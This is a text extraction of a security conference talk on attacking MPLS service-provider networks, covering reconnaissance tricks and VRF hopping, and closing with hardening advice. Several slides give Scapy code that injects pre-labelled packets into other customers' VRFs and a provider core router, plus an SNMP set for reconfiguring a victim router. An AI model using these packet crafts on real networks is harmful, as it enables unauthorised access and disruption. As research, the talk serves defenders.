SlideShare uma empresa Scribd logo
1 de 68
Baixar para ler offline
Labs.mwrinfosecurity.com | © MWR Labs 1
Labs.mwrinfosecurity.com | © MWR Labs
Warranty Void If Label Removed:
Attacking MPLS Networks
Tokyo, Japan
G. Geshev
Labs.mwrinfosecurity.com | © MWR Labs 4
Agenda
• MPLS Technology
• Previous MPLS Research
• MPLS Attacks
• VRF Hopping
• Hardening
• Future Research
Labs.mwrinfosecurity.com | © MWR Labs 5
Agenda
• MPLS Technology
• Previous MPLS Research
• MPLS Attacks
• VRF Hopping
• Hardening
• Future Research
Labs.mwrinfosecurity.com | © MWR Labs 6
MPLS Technology
What is MPLS?
• Service Provider Networks
• Multiprotocol Label Switching Architecture [RFC-3031]
• IP Address (L3) vs. Label (L2) Lookups
• Single Longest Prefix Match
• Label Information Base (LIB)
• Virtual Private Networks
• MPLS L3VPN
• MPLS L2VPN / Virtual Private LAN Services (VPLS)
Labs.mwrinfosecurity.com | © MWR Labs 7
MPLS Terms
What do we need to know?
• Labels
• Push, Pop, and Swap Operations
• Reserved Labels
• Label-Switching Router (LSR)
• Provider Router (P)
• Label Edge Router (LER)
• Provider Edge Router (PE)
• Label Switched Path (LSP)
• Customer Edge Router (CE)
Labs.mwrinfosecurity.com | © MWR Labs 8
MPLS Terms
What do we need to know?
• Virtual Routing and Forwarding (VRF)
• Allows multiple instances of a routing table to exist and
operate simultaneously on the same physical device.
• VRF Layer 3 segmentation is analogous to VLAN Layer
2 segmentation.
• VRFs are only locally significant to the router.
Labs.mwrinfosecurity.com | © MWR Labs 10
MPLS Topology
Customer Site A Customer Site B
Service Provider Network
Labs.mwrinfosecurity.com | © MWR Labs 11
MPLS Encapsulation
How is traffic handled at the ingress edge?
• Label Information Base (LIB) Lookup
• MPLS Encapsulation
• MPLS Header (Layer 2.5)
• Label Stack
Labs.mwrinfosecurity.com | © MWR Labs 12
MPLS Encapsulation
MPLS Header
• Layer 2.5
Labs.mwrinfosecurity.com | © MWR Labs 13
Agenda
• MPLS Technology
• Previous MPLS Research
• MPLS Attacks
• VRF Hopping
• Hardening
• Future Research
Labs.mwrinfosecurity.com | © MWR Labs 14
Retrospection
• IP Backbone Security
Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002
• MPLS and VPLS Security
Enno Rey, ERNW, 2006
• MPLS Security Overview
Thorsten Fischer, IRM, 2007
• Hijacking Label Switched Networks in the Cloud
Paul Coggin, Dynetics, 2014
• Playing with Labelled Switching
Tim Brown, Portcullis Labs, 2015
Labs.mwrinfosecurity.com | © MWR Labs 15
• IP Backbone Security
Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002
• MPLS and VPLS Security
Enno Rey, ERNW, 2006
• MPLS Security Overview
Thorsten Fischer, IRM, 2007
• Hijacking Label Switched Networks in the Cloud
Paul Coggin, Dynetics, 2014
• Playing with Labelled Switching
Tim Brown, Portcullis Labs, 2015
Retrospection
Labs.mwrinfosecurity.com | © MWR Labs 16
• IP Backbone Security
Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002
• MPLS and VPLS Security
Enno Rey, ERNW, 2006
• MPLS Security Overview
Thorsten Fischer, IRM, 2007
• Hijacking Label Switched Networks in the Cloud
Paul Coggin, Dynetics, 2014
• Playing with Labelled Switching
Tim Brown, Portcullis Labs, 2015
Retrospection
Labs.mwrinfosecurity.com | © MWR Labs 17
• IP Backbone Security
Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002
• MPLS and VPLS Security
Enno Rey, ERNW, 2006
• MPLS Security Overview
Thorsten Fischer, IRM, 2007
• Hijacking Label Switched Networks in the Cloud
Paul Coggin, Dynetics, 2014
• Playing with Labelled Switching
Tim Brown, Portcullis Labs, 2015
Retrospection
Labs.mwrinfosecurity.com | © MWR Labs 18
• IP Backbone Security
Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002
• MPLS and VPLS Security
Enno Rey, ERNW, 2006
• MPLS Security Overview
Thorsten Fischer, IRM, 2007
• Hijacking Label Switched Networks in the Cloud
Paul Coggin, Dynetics, 2014
• Playing with Labelled Switching
Tim Brown, Portcullis Labs, 2015
Retrospection
Labs.mwrinfosecurity.com | © MWR Labs 19
• IP Backbone Security
Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002
• MPLS and VPLS Security
Enno Rey, ERNW, 2006
• MPLS Security Overview
Thorsten Fischer, IRM, 2007
• Hijacking Label Switched Networks in the Cloud
Paul Coggin, Dynetics, 2014
• Playing with Labelled Switching
Tim Brown, Portcullis Labs, 2015
Retrospection
Labs.mwrinfosecurity.com | © MWR Labs 20
• IP Backbone Security
Nicolas Fischbach, Sébastien Lacoste-Seris, COLT Telecom, 2002
• MPLS and VPLS Security
Enno Rey, ERNW, 2006
• MPLS Security Overview
Thorsten Fischer, IRM, 2007
• Hijacking Label Switched Networks in the Cloud
Paul Coggin, Dynetics, 2014
• Playing with Labelled Switching
Tim Brown, Portcullis Labs, 2015
Retrospection
Labs.mwrinfosecurity.com | © MWR Labs 21
Agenda
• MPLS Technology
• Previous MPLS Research
• MPLS Attacks
• VRF Hopping
• Hardening
• Future Research
Labs.mwrinfosecurity.com | © MWR Labs 22
MPLS Network Reconnaissance
Basic PE Reconnaissance
• MAC Address
• Management Protocols
• LLDP, CDP, MNDP
• Routing Protocols
• OSPF, IS-IS, etc.
• Services
• Telnet, SSH, HTTP, SNMP, etc.
Labs.mwrinfosecurity.com | © MWR Labs 23
MPLS Network Reconnaissance
Concealed Devices and Links
• Analysis of the Security of BGP/MPLS IP Virtual Private
Networks [RFC-4381]
Service providers and end-customers do not normally want their
network topology revealed to the outside. […] If an attacker
doesn't know the address of a victim, he can only guess the IP
addresses to attack.
Labs.mwrinfosecurity.com | © MWR Labs 24
MPLS Network Reconnaissance
Concealed Devices and Links
• Analysis of the Security of BGP/MPLS IP Virtual Private
Networks [RFC-4381]
This makes it very hard to attack the core, although some
functionality such as pinging core routers will be lost.
Traceroute across the core will still work, since it addresses a
destination outside the core.
Labs.mwrinfosecurity.com | © MWR Labs 25
MPLS Network Reconnaissance
Concealed Devices and Links
• Analysis of the Security of BGP/MPLS IP Virtual Private
Networks [RFC-4381]
It has to be mentioned specifically that information hiding as
such does not provide security. However, in the market this is a
perceived requirement.
Labs.mwrinfosecurity.com | © MWR Labs 26
MPLS Network Reconnaissance
Concealed Devices and Links
• IP TTL Propagation
• PE devices decrement the TTL from the IP header and
copy the value into the MPLS header.
• Propagating the TTL value is enabled by default for a
large number of vendors.
• ICMP Tunnelling
• If an ICMP message is generated by an LSR, the ICMP
message is carried all the way to the end of the LSP
before it is routed back.
Labs.mwrinfosecurity.com | © MWR Labs 27
MPLS Network Reconnaissance
Service Provider NetworkClient Site A Client Site B
Sample Topology*
• Basic Service Provider Network
• One Provider (P) and two Provider Edge (PE) devices.
• Customer Network
• Customer Edge (CE) device at each site.
192.168.100.2/30 192.168.101.2/30
Labs.mwrinfosecurity.com | © MWR Labs 28
MPLS Network Reconnaissance
Service Provider NetworkClient Site A Client Site B
192.168.100.2/30 192.168.101.2/30
root@R1:~# traceroute -n -e 192.168.101.2
traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60
byte packets
1 192.168.100.1 51.647 ms 61.218 ms 71.238 ms
2 172.16.0.1 <MPLS:L=16,E=0,S=0,T=1/L=19,E=0,S=1,T=1>
81.074 ms 91.056 ms 101.060 ms
3 172.16.0.6 <MPLS:L=19,E=0,S=1,T=1> 121.041 ms 131.009
ms 140.959 ms
4 192.168.101.2 161.038 ms 170.997 ms 180.984 ms
root@R1:~#
R1
Labs.mwrinfosecurity.com | © MWR Labs 29
MPLS Network Reconnaissance
Service Provider NetworkClient Site A Client Site B
192.168.100.2/30 192.168.101.2/30
root@R1:~# traceroute -n -e 192.168.101.2
traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60
byte packets
1 192.168.100.1 51.647 ms 61.218 ms 71.238 ms
2 172.16.0.1 <MPLS:L=16,E=0,S=0,T=1/L=19,E=0,S=1,T=1>
81.074 ms 91.056 ms 101.060 ms
3 172.16.0.6 <MPLS:L=19,E=0,S=1,T=1> 121.041 ms 131.009
ms 140.959 ms
4 192.168.101.2 161.038 ms 170.997 ms 180.984 ms
root@R1:~#
R1
Labs.mwrinfosecurity.com | © MWR Labs 30
MPLS Network Reconnaissance
Service Provider NetworkClient Site A Client Site B
192.168.100.2/30 192.168.101.2/30
root@R1:~# traceroute -n -e 192.168.101.2
traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60
byte packets
1 192.168.100.1 51.647 ms 61.218 ms 71.238 ms
2 172.16.0.1 <MPLS:L=16,E=0,S=0,T=1/L=19,E=0,S=1,T=1>
81.074 ms 91.056 ms 101.060 ms
3 172.16.0.6 <MPLS:L=19,E=0,S=1,T=1> 121.041 ms 131.009
ms 140.959 ms
4 192.168.101.2 161.038 ms 170.997 ms 180.984 ms
root@R1:~#
R1
Labs.mwrinfosecurity.com | © MWR Labs 31
MPLS Network Reconnaissance
In a nutshell…
Let us consider a scenario with IP TTL Propagation and
ICMP Tunnelling disabled as per best practices.
Labs.mwrinfosecurity.com | © MWR Labs 32
MPLS Network Reconnaissance
In a nutshell…
Let us consider a scenario with IP TTL Propagation and
ICMP Tunnelling disabled as per best practices.
Labs.mwrinfosecurity.com | © MWR Labs 33
MPLS Network Reconnaissance
How many LSRs are there?
• Basic enumeration trick reveals the number of
intermediate service provider devices along the LSP.
• Generate a series of ICMP echo requests encapsulated in
MPLS with sequentially incrementing TTL values.
• Label values may vary within the reserved range.
• Prerequisite is for a PE to process MPLS encapsulated
traffic received on a customer interface.
Labs.mwrinfosecurity.com | © MWR Labs 34
MPLS Network Reconnaissance
Service Provider NetworkClient Site A Client Site B
192.168.100.2/30 192.168.101.2/30
>>> load_contrib('mpls')
>>> a = Ether(src = '08:00:27:12:27:13', dst =
‘XX:XX:XX:a3:7b:01')
>>> b = MPLS(label = 0, ttl = range(0, 4))
>>> c = IP(src = '192.168.100.2', dst = '192.168.101.2')
>>> d = ICMP()
>>> sendp(a/b/c/d)
...
Sent 4 packets.
>>>
R1
Labs.mwrinfosecurity.com | © MWR Labs 35
root@R1:~# tcpdump -ntr traffic.pcap
reading from file modified.pcap, link-type EN10MB (Ethernet)
MPLS (label 0, exp 0, [S], ttl 0) IP 192.168.100.2 > 192.168.101.2:
ICMP echo request, id 0, seq 0, length 8
IP 192.168.100.1 > 192.168.100.2: ICMP time exceeded in-transit,
length 36
MPLS (label 0, exp 0, [S], ttl 1) IP 192.168.100.2 > 192.168.101.2:
ICMP echo request, id 0, seq 0, length 8
IP 192.168.100.1 > 192.168.100.2: ICMP time exceeded in-transit,
length 36
MPLS (label 0, exp 0, [S], ttl 2) IP 192.168.100.2 > 192.168.101.2:
ICMP echo request, id 0, seq 0, length 8
IP 192.168.100.1 > 192.168.100.2: ICMP time exceeded in-transit,
length 36
MPLS (label 0, exp 0, [S], ttl 3) IP 192.168.100.2 > 192.168.101.2:
ICMP echo request, id 0, seq 0, length 8
root@R1:~#
MPLS Network Reconnaissance
Labs.mwrinfosecurity.com | © MWR Labs 36
MPLS Network Reconnaissance
192.168.100.2/30 192.168.101.2/30
How about LSR/LER IP addresses?
• The number of intermediate devices along the LSP is
mostly irrelevant anyway.
• Revealing the LSR/LER IP addresses would be a lot more
beneficial to an attacker.
Labs.mwrinfosecurity.com | © MWR Labs 37
MPLS Network Reconnaissance
192.168.100.2/30 192.168.101.2/30
172.16.0.0/30 172.16.0.4/30
.2 .1 .5 .6
root@R1:~# traceroute -n 192.168.101.2
traceroute to 192.168.101.2 (192.168.101.2), 30 hops max, 60
byte packets
1 192.168.100.1 0.417 ms 0.289 ms 0.274 ms
2 192.168.101.2 32.230 ms 43.308 ms 54.030 ms
root@R1:~#
R1
Labs.mwrinfosecurity.com | © MWR Labs 39
MPLS Network Reconnaissance
192.168.100.2/30 192.168.101.2/30
172.16.0.0/30 172.16.0.4/30
.2 .1 .5 .6
root@R1:~# hping3 -G --icmp -c 1 192.168.101.2
HPING 192.168.101.2 (eth0 192.168.101.2): icmp mode set, 28
headers + 0 data bytes
len=68 ip=192.168.101.2 ttl=254 id=13178 icmp_seq=0 rtt=30.8
ms
RR: 1.2.3.4
172.16.0.1
192.168.101.1
192.168.101.2
192.168.101.2
172.16.0.6
192.168.100.1
--- 192.168.101.2 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 30.8/30.8/30.8 ms
root@R1:~#
Labs.mwrinfosecurity.com | © MWR Labs 40
MPLS Network Reconnaissance
192.168.100.2/30 192.168.101.2/30
172.16.0.0/30 172.16.0.4/30
.2 .1 .5 .6
root@R1:~# hping3 -G --icmp -c 1 192.168.101.2
HPING 192.168.101.2 (eth0 192.168.101.2): icmp mode set, 28
headers + 0 data bytes
len=68 ip=192.168.101.2 ttl=254 id=13178 icmp_seq=0 rtt=30.8
ms
RR: 1.2.3.4
172.16.0.1
192.168.101.1
192.168.101.2
192.168.101.2
172.16.0.6
192.168.100.1
--- 192.168.101.2 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 30.8/30.8/30.8 ms
root@R1:~#
Labs.mwrinfosecurity.com | © MWR Labs 41
MPLS Network Reconnaissance
Remember IP Record Route?
• IP option used to trace the route an IP packet takes
through the network.
• Router is expected to insert its IP address as configured
on its egress interface.
• Label Switching Routers (LSR) process traffic based on
labels in the MPLS header.
• The question remains as to why a number of
implementations honor the IP options field.
Labs.mwrinfosecurity.com | © MWR Labs 42
MPLS Network Reconnaissance
192.168.100.2/30 192.168.101.2/30
172.16.0.0/30 172.16.0.4/30
.2 .1 .5 .6
Now what?
• Sending traffic directly to an LSR interface.
• Assume point-to-point links and derive the internal IP
address of an adjacent PE device.
• There is no way for an intermediate LSR to reply due to
lack of routing information.
• Remember that a VRF has only local significance.
Labs.mwrinfosecurity.com | © MWR Labs 43
MPLS Network Reconnaissance
192.168.100.2/30 192.168.101.2/30
172.16.0.0/30 172.16.0.4/30
.2 .1 .5 .6
root@R1:~# ping -c 3 172.16.0.2
PING 172.16.0.2 (172.16.0.2) 56(84) bytes of data.
64 bytes from 172.16.0.2: icmp_seq=1 ttl=64 time=1.31 ms
64 bytes from 172.16.0.2: icmp_seq=2 ttl=64 time=0.537 ms
64 bytes from 172.16.0.2: icmp_seq=3 ttl=64 time=0.545 ms
--- 172.16.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time
2002ms
rtt min/avg/max/mdev = 0.537/0.942/1.744/0.567 ms
root@R1:~#
R1
Labs.mwrinfosecurity.com | © MWR Labs 44
MPLS Network Reconnaissance
Food for thought?
• Test results varied per implementation.
• One vendor was unaffected.
• Several vendors were affected by one or more than one
of these weaknesses.
• One vendor was affected by all of these.
• What about a heterogeneous network?
Labs.mwrinfosecurity.com | © MWR Labs 45
Agenda
• MPLS Technology
• Previous MPLS Research
• MPLS Attacks
• VRF Hopping
• Hardening
• Future Research
Labs.mwrinfosecurity.com | © MWR Labs 46
VRF Hopping
What is VRF hopping?
• Unauthorised Inter-VRF communication.
• Breaking out of our VRF and injecting traffic into other
customers’ VRFs.
• Potentially allowing for injecting into a service provider’s
management VRF.
• It is usually achieved by sending pre-labelled traffic to a
Provider Edge (PE) device.
• It is possible on a misconfigured PE to CE link.
• Potentially complicated in case of overlapping address
spaces across the VRFs.
Labs.mwrinfosecurity.com | © MWR Labs 48
VRF Hopping
Attacking MPLS Clients
• Customer traffic flows within dedicated VRFs.
• There is no Inter-VRF communication, unless route
leaking is explicitly configured.
• Global routing table into a VRF and vice versa.
• VRF to VRF.
• Attacking other clients implies Inter-VRF traffic flow.
• Successful VRF hopping attack results in reaching another
client’s CE device.
Labs.mwrinfosecurity.com | © MWR Labs 49
Attacking MPLS Clients
• Customer A (VRF A)
• Site 1 (R1): 192.168.100.2/30
• Site 2 (R2): 192.168.101.2/30
• Customer B (VRF B)
• Site 1 (R3): 192.168.200.2/30
• Site 2 (R4): 192.168.201.2/30
192.168.100.2/30 192.168.101.2/30
192.168.201.2/30192.168.200.2/30
R1 R2
R3 R4
Labs.mwrinfosecurity.com | © MWR Labs 50
192.168.100.2/30 192.168.101.2/30
192.168.201.2/30192.168.200.2/30
root@R1:~# ping -c 3 192.168.201.2
PING 192.168.201.2 (192.168.201.2) 56(84) bytes of data.
--- 192.168.201.2 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time
1999ms
root@R1:~#
R1 R2
R3 R4
Labs.mwrinfosecurity.com | © MWR Labs 51
192.168.100.2/30 192.168.101.2/30
192.168.201.2/30192.168.200.2/30
R4# debug ip icmp
ICMP packet debugging is on
R4#
R1 R2
R3 R4
Labs.mwrinfosecurity.com | © MWR Labs 52
192.168.100.2/30 192.168.101.2/30
192.168.201.2/30192.168.200.2/30
>>> load_contrib('mpls')
>>> a = Ether(src = '08:00:27:12:27:13', dst =
‘XX:XX:XX:a3:7b:01')
>>> b = MPLS(ttl = 64, label = range(1000, 1500))
>>> c = IP(src = '192.168.100.2', dst = '192.168.201.2')
>>> d = ICMP()
>>> sendp(a/b/c/d)
...
Sent 500 packets.
>>>
R1 R2
R3 R4
Labs.mwrinfosecurity.com | © MWR Labs 53
192.168.100.2/30 192.168.101.2/30
192.168.201.2/30192.168.200.2/30
>>> load_contrib('mpls')
>>> a = Ether(src = '08:00:27:12:27:13', dst =
‘XX:XX:XX:a3:7b:01')
>>> b = MPLS(ttl = 64, label = range(1000, 1500))
>>> c = IP(src = '192.168.100.2', dst = '192.168.201.2')
>>> d = ICMP()
>>> sendp(a/b/c/d)
...
Sent 500 packets.
>>>
R1 R2
R3 R4
R1 R4
Labs.mwrinfosecurity.com | © MWR Labs 54
192.168.100.2/30 192.168.101.2/30
192.168.201.2/30192.168.200.2/30
R4#
*Mar 1 00:29:34.383: ICMP: echo reply sent, src
192.168.201.2, dst 192.168.100.2
*Mar 1 00:29:34.387: ICMP: echo reply sent, src
192.168.201.2, dst 192.168.100.2
R4#
R1 R2
R3 R4
Labs.mwrinfosecurity.com | © MWR Labs 55
192.168.100.2/30 192.168.101.2/30
192.168.201.2/30192.168.200.2/30
R4#
*Mar 1 00:29:34.383: ICMP: echo reply sent, src
192.168.201.2, dst 192.168.100.2
*Mar 1 00:29:34.387: ICMP: echo reply sent, src
192.168.201.2, dst 192.168.100.2
R4#
R1 R2
R3 R4
R1
Labs.mwrinfosecurity.com | © MWR Labs 56
VRF Hopping
Attacking Service Provider Devices
• MPLS core devices should never be directly reachable
from customers.
• LSRs are usually accessed from within a dedicated
management VRF.
• Injecting traffic with certain labels may allow for reaching
an LSR.
Labs.mwrinfosecurity.com | © MWR Labs 57
192.168.100.2/30
root@R1:~# ping -c 3 172.16.0.1
PING 172.16.0.1 (172.16.0.1) 56(84) bytes of data.
--- 172.16.0.1 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time
2015ms
root@R1:~#
R1 R2
R3 R4
P
172.16.0.0/30 172.16.0.4/30
.1 .5
Labs.mwrinfosecurity.com | © MWR Labs 58
192.168.100.2/30
<P> debugging ip icmp
<P> terminal monitor
The current terminal is enabled to display logs.
<P> terminal debugging
The current terminal is enabled to display debugging logs.
<P>
R1 R2
R3 R4
P
172.16.0.0/30 172.16.0.4/30
.1 .5
Labs.mwrinfosecurity.com | © MWR Labs 59
192.168.100.2/30
R1 R2
R3 R4
P
172.16.0.0/30 172.16.0.4/30
.1 .5
>>> load_contrib('mpls')
>>> a = Ether(src = '08:00:27:12:27:13', dst =
‘XX:XX:XX:a3:7b:01')
>>> b = MPLS(ttl = 64, label = range(1000, 1500))
>>> c = IP(src = '192.168.100.2', dst = '172.16.0.1')
>>> d = ICMP()
>>> sendp(a/b/c/d)
...
Sent 500 packets.
>>>
Labs.mwrinfosecurity.com | © MWR Labs 60
192.168.100.2/30
R2R1
<P>
*Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP:
Time(s):1445358249 ICMP Input:
ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1
type = 8, code = 0 (echo)
*Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP:
Time(s):1445358249 ICMP Output:
ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2
type = 0, code = 0 (echo-reply)
*Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP:
Time(s):1445358249 ICMP Input:
ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1
type = 8, code = 0 (echo)
*Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP:
Time(s):1445358249 ICMP Output:
ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2
type = 0, code = 0 (echo-reply)
<P>
Labs.mwrinfosecurity.com | © MWR Labs 61
192.168.100.2/30
R2R1
<P>
*Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP:
Time(s):1445358249 ICMP Input:
ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1
type = 8, code = 0 (echo)
*Oct 20 16:24:09:891 2015 P SOCKET/7/ICMP:
Time(s):1445358249 ICMP Output:
ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2
type = 0, code = 0 (echo-reply)
*Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP:
Time(s):1445358249 ICMP Input:
ICMP Packet: src = 192.168.100.2, dst = 172.16.0.1
type = 8, code = 0 (echo)
*Oct 20 16:24:09:894 2015 P SOCKET/7/ICMP:
Time(s):1445358249 ICMP Output:
ICMP Packet: src = 172.16.0.1, dst = 192.168.100.2
type = 0, code = 0 (echo-reply)
<P>
R1
R1
Labs.mwrinfosecurity.com | © MWR Labs 62
VRF Hopping
Attack Limitations
• VLAN hopping limitations apply, i.e. one-way
communication.
• It is only useful against stateless protocols, e.g. SNMP.
• Success or failure of attack is uncertain due to lack of
response.
• Label ranges will vary based on network size and vendor
equipment.
• Attacker can only reach a service provider LSR/LER or
another customer’s CE.*
Labs.mwrinfosecurity.com | © MWR Labs 63
VRF Hopping Improvements
How about two-way communication?
• There is always room for configuration- and design-
specific attacks.
• SNMP attacks require poorly configured CE devices.
• Managed vs. Unmanaged Services.
• Customer managed CE devices are most likely less
hardened.
Labs.mwrinfosecurity.com | © MWR Labs 64
VRF Hopping Improvements
What do we need?
• Configuration Prerequisites
• SNMP write access enabled on a CE device.
• Service accessible over a CE to PE link.
• Low complexity SNMP community string.
• Attack Scenario
• VRF hopping as previously demonstrated.
• SNMP community string guesswork.
• Force the CE to encapsulate certain traffic in MPLS.
• Configure an MPLS static binding rule.
Labs.mwrinfosecurity.com | © MWR Labs 65
192.168.100.2/30
192.168.201.2/30
R1 R2
R3 R4
>>> a = Ether(src = '08:00:27:12:27:13', dst =
‘XX:XX:XX:a3:7b:01')
>>> b = MPLS(ttl = 64, label = range(1000, 1500))
>>> c = IP(src = '192.168.100.2', dst = '192.168.201.2')
>>> d = UDP(sport = 161, dport = 161)
>>> e = SNMP(community = '...', PDU = SNMPset(varbindlist =
[SNMPvarbind(oid = ASN1_OID('...'), value = ...)]))
>>> sendp(a/b/c/d/e)
...
Sent 500 packets.
>>>
Labs.mwrinfosecurity.com | © MWR Labs 66
VRF Hopping Improvements
What can go wrong?
• SNMP hurdles are highly likely.
• The interesting MIBs may be read-only.
• Picking up the wrong OID values.
• Denial of Service due to introducing CE misconfigurations.
Labs.mwrinfosecurity.com | © MWR Labs 73
Agenda
• MPLS Technology
• Previous MPLS Research
• MPLS Attacks
• VRF Hopping
• Hardening
• Future Research
Labs.mwrinfosecurity.com | © MWR Labs 74
MPLS Hardening
MPLS Network Security Recommendations
• Disable IP TTL propagation at the edge of the MPLS
domain, i.e. on the ingress LSRs.
• Disable ICMP tunnelling throughout the LSPs.
• Disable management protocols and unwanted services on
the customer facing interfaces.
• Enable Generalised TTL Security Mechanism (GTSM)
[RFC-3682].
• Follow the recommendations as specified in Security
Framework for MPLS and GMPLS Networks [RFC-5920].
Labs.mwrinfosecurity.com | © MWR Labs 75
MPLS Hardening
General Guidelines
• Assume presence of malicious or compromised clients.
• Restrictive ACLs for accessing the LSR devices.
• Secure device management protocols, e.g. SNMPv3,
HTTPS, SSH.
• Routing protocol authentication.
• MPLS signalling protocol authentication.
• Centralised AAA services and logging.
• Secure configuration baseline.
• Consistent configurations across the network.
• Configuration files version control.
Labs.mwrinfosecurity.com | © MWR Labs 76
Agenda
• MPLS Technology
• Previous MPLS Research
• MPLS Attacks
• VRF Hopping
• Hardening
• Future Research
Labs.mwrinfosecurity.com | © MWR Labs 77
Future Research
What else is there to look at?
• VRF Hopping Attack Scenarios
• UDP Services
• MPLS Signalling Protocols
• Label Distribution Protocol (LDP)
• Resource Reservation Protocol (RSVP)
• More Protocol Fuzzing
Labs.mwrinfosecurity.com | © MWR Labs 78
Acknowledgements
• MWR Labs
• Alex Plaskett
• John Fitzpatrick
• Harry Grobbelaar
• Willie Victor
• Pavel Stefanov (CCIE R&S, CCIE Service Provider)
Labs.mwrinfosecurity.com | © MWR Labs 79
Questions
• Feedback
• @munmap
• georgi.geshev@mwrinfosecurity.com

Mais conteúdo relacionado

Mais procurados

DDoS Mitigation using BGP Flowspec
DDoS Mitigation using BGP Flowspec DDoS Mitigation using BGP Flowspec
DDoS Mitigation using BGP Flowspec APNIC
 
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPTImplementation of isp mpls backbone network on i pv6 using 6 pe routers main PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPTSatish Kumar
 
Applying IPv6 to LTE Networks
Applying IPv6 to LTE NetworksApplying IPv6 to LTE Networks
Applying IPv6 to LTE NetworksAPNIC
 
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...gogo6
 
EANTC Test Report: ADVA FSP 150 ProVMe
EANTC Test Report: ADVA FSP 150 ProVMeEANTC Test Report: ADVA FSP 150 ProVMe
EANTC Test Report: ADVA FSP 150 ProVMeADVA
 
The Use of IPv6 in IoT
The Use of IPv6 in IoTThe Use of IPv6 in IoT
The Use of IPv6 in IoTOliver Müller
 
6TiSCH + RPL @ Telecom Bretagne 2014
6TiSCH + RPL @ Telecom Bretagne 20146TiSCH + RPL @ Telecom Bretagne 2014
6TiSCH + RPL @ Telecom Bretagne 2014Pascal Thubert
 
The Role of the Communication Protocols in the IoT: Pitfalls and Advantages
The Role of the Communication Protocols in the IoT: Pitfalls and AdvantagesThe Role of the Communication Protocols in the IoT: Pitfalls and Advantages
The Role of the Communication Protocols in the IoT: Pitfalls and AdvantagesFabio Gatti
 
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGatePLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGate
PLNOG 9: Robert Dąbrowski - Carrier-grade NAT (CGN) Solution with FortiGatePROIDEA
 
Summit 16: Open Baton Overview
Summit 16: Open Baton OverviewSummit 16: Open Baton Overview
Summit 16: Open Baton OverviewOPNFV
 
10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga
10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga10 (IDNOG01) Introduction about ICANN by Champika Wijayatunga
10 (IDNOG01) Introduction about ICANN by Champika WijayatungaIndonesia Network Operators Group
 
Why I should Model my Network
Why I should Model my NetworkWhy I should Model my Network
Why I should Model my NetworkAPNIC
 
Bringing Better Networking to LTE IoT
Bringing Better Networking to LTE IoTBringing Better Networking to LTE IoT
Bringing Better Networking to LTE IoTHaystack Technologies
 
I/O virtualization with InfiniBand and 40 Gigabit Ethernet
I/O virtualization with InfiniBand and 40 Gigabit EthernetI/O virtualization with InfiniBand and 40 Gigabit Ethernet
I/O virtualization with InfiniBand and 40 Gigabit EthernetMellanox Technologies
 
Kubernetes OpenContrail Meetup
Kubernetes OpenContrail MeetupKubernetes OpenContrail Meetup
Kubernetes OpenContrail MeetupLachlan Evenson
 

Mais procurados (20)

DDoS Mitigation using BGP Flowspec
DDoS Mitigation using BGP Flowspec DDoS Mitigation using BGP Flowspec
DDoS Mitigation using BGP Flowspec
 
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPTImplementation of isp mpls backbone network on i pv6 using 6 pe routers main PPT
Implementation of isp mpls backbone network on i pv6 using 6 pe routers main PPT
 
Pro Viva Emmanuel
Pro Viva EmmanuelPro Viva Emmanuel
Pro Viva Emmanuel
 
Applying IPv6 to LTE Networks
Applying IPv6 to LTE NetworksApplying IPv6 to LTE Networks
Applying IPv6 to LTE Networks
 
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
IoT Field Area Network Solutions & Integration of IPv6 Standards by Patrick G...
 
EANTC Test Report: ADVA FSP 150 ProVMe
EANTC Test Report: ADVA FSP 150 ProVMeEANTC Test Report: ADVA FSP 150 ProVMe
EANTC Test Report: ADVA FSP 150 ProVMe
 
IoT Gent meetup
IoT Gent meetupIoT Gent meetup
IoT Gent meetup
 
ICE basic
ICE basicICE basic
ICE basic
 
The Use of IPv6 in IoT
The Use of IPv6 in IoTThe Use of IPv6 in IoT
The Use of IPv6 in IoT
 
6TiSCH + RPL @ Telecom Bretagne 2014
6TiSCH + RPL @ Telecom Bretagne 20146TiSCH + RPL @ Telecom Bretagne 2014
